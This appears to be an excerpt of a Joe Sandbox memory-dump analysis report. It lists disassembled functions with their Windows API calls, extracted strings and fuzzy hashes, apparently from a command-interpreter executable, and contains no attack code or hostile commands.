                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateProcessmemmovewcschr
                                                                              • String ID: &()[]{}^=;!%'+,`~
                                                                              • API String ID: 4220614737-381716982
                                                                              • Opcode ID: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                                                                              • Instruction ID: dc1a4a19d59ebf6b269b8b0803f1eb344b771883ee2996f306fcb1ce8c5bbd42
                                                                              • Opcode Fuzzy Hash: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                                                                              • Instruction Fuzzy Hash: E571B7B1A0C252D9EB68BF15E440679F6A4FB9C795F404236C96DC7BB6CF3CA4518B00
                                                                              Function 00007FF64B56E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              • longjmp.MSVCRT ref: 00007FF64B57CCBC
                                                                              • longjmp.MSVCRT(?,?,00000000,00007FF64B571F69,?,?,?,?,?,?,?,00007FF64B56286E,00000000,00000000,00000000,00000000), ref: 00007FF64B57CCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                              • String ID: GeToken: (%x) '%s'
                                                                              • API String ID: 3282654869-1994581435
                                                                              • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                              • Instruction ID: 5105584362beb2cf897bddbf296d011b5ef99a62a1cf1149c48e09764e1d626e
                                                                              • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                              • Instruction Fuzzy Hash: AF61DF61B0E64282FA1CBF21E45427DA3A0AF5CBA4F545935CA3D8B6F7EE7CE4418700
                                                                              Function 00007FF64B5908EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memmovewcsncmp
                                                                              • String ID: 0123456789
                                                                              • API String ID: 3879766669-2793719750
                                                                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                              • Instruction ID: 04f40218c2ec25c9f78f491eed9afa60a510a8a2e74731e22fdd077f67fceba5
                                                                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                              • Instruction Fuzzy Hash: 8641D762F1C786C1EA29BF36D4002BAA395FB4CB90F485531DE6E877A6DE3CD4418780
                                                                              Function 00007FF64B589784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B5897D0
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B5898D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                              • String ID: Software\Classes
                                                                              • API String ID: 2714550308-1656466771
                                                                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                              • Instruction ID: eecd0ad035f943be5a88bdadabd257ea16ea512f8233cc222c99b115a574e78f
                                                                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                              • Instruction Fuzzy Hash: 21418D22A1D75281EA48FF16E445039B3A4FB98BD0F509131DA6E877F2DE39D866C740
                                                                              Function 00007FF64B58A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B58A0FC
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF64B58A1FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                              • String ID: Software\Classes
                                                                              • API String ID: 2714550308-1656466771
                                                                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                              • Instruction ID: a8d07fe793d3de4a16bbbd54b779132cd17869ea3c505c89b5033615dece291b
                                                                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                              • Instruction Fuzzy Hash: 20417E22A1DB5681EA09BF15D445439B3A5FF887D0F508131DA6EC77B2DF39E866C340
                                                                              Function 00007FF64B56CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleTitle
                                                                              • String ID: -
                                                                              • API String ID: 3358957663-3695764949
                                                                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                              • Instruction ID: 97607d27210d06bb0214de47598f7365e320c65ed2444f9d920f60ae82478c47
                                                                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                              • Instruction Fuzzy Hash: DA315921B0C64286EA18BF11E800078FBA4AB4DB90F589135CA2E97BF7DFBCE451C754
                                                                              Function 00007FF64B577280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmpswscanf
                                                                              • String ID: :EOF
                                                                              • API String ID: 1534968528-551370653
                                                                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                              • Instruction ID: ccfdc26da83cba094993acb69bd07c56163d0e53fa5a2907f84d35fa56c07227
                                                                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                              • Instruction Fuzzy Hash: 45315C71B0CA4286EA6CBF15F8402B8B6A0EF4DB50F448131DA6D862B6DF6CE841C640
                                                                              Function 00007FF64B563BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsnicmp
                                                                              • String ID: /-Y
                                                                              • API String ID: 1886669725-4274875248
                                                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                              • Instruction ID: 29f653c6ec309a224caf529fdde8cc4d518c7214cfeb0afd5cfe9fe6507ab40c
                                                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                              • Instruction Fuzzy Hash: 66213065E0C65681FA18BF0AD540178B6A0BF4DFC0F449031EE6D977A6EE3CE492D700
                                                                              Function 00007FF64B5706C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcess
                                                                              • String ID:
                                                                              • API String ID: 1617791916-0
                                                                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                              • Instruction ID: c76aac582b3a4af72e1242357b8117bbac1635542fa95e2f4f3ed9ab42ef5d39
                                                                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                              • Instruction Fuzzy Hash: 22414D72A0D64286EA5CBF64E44057AB7E0EB4DB40F588035C66E837A2DF7CA545CB40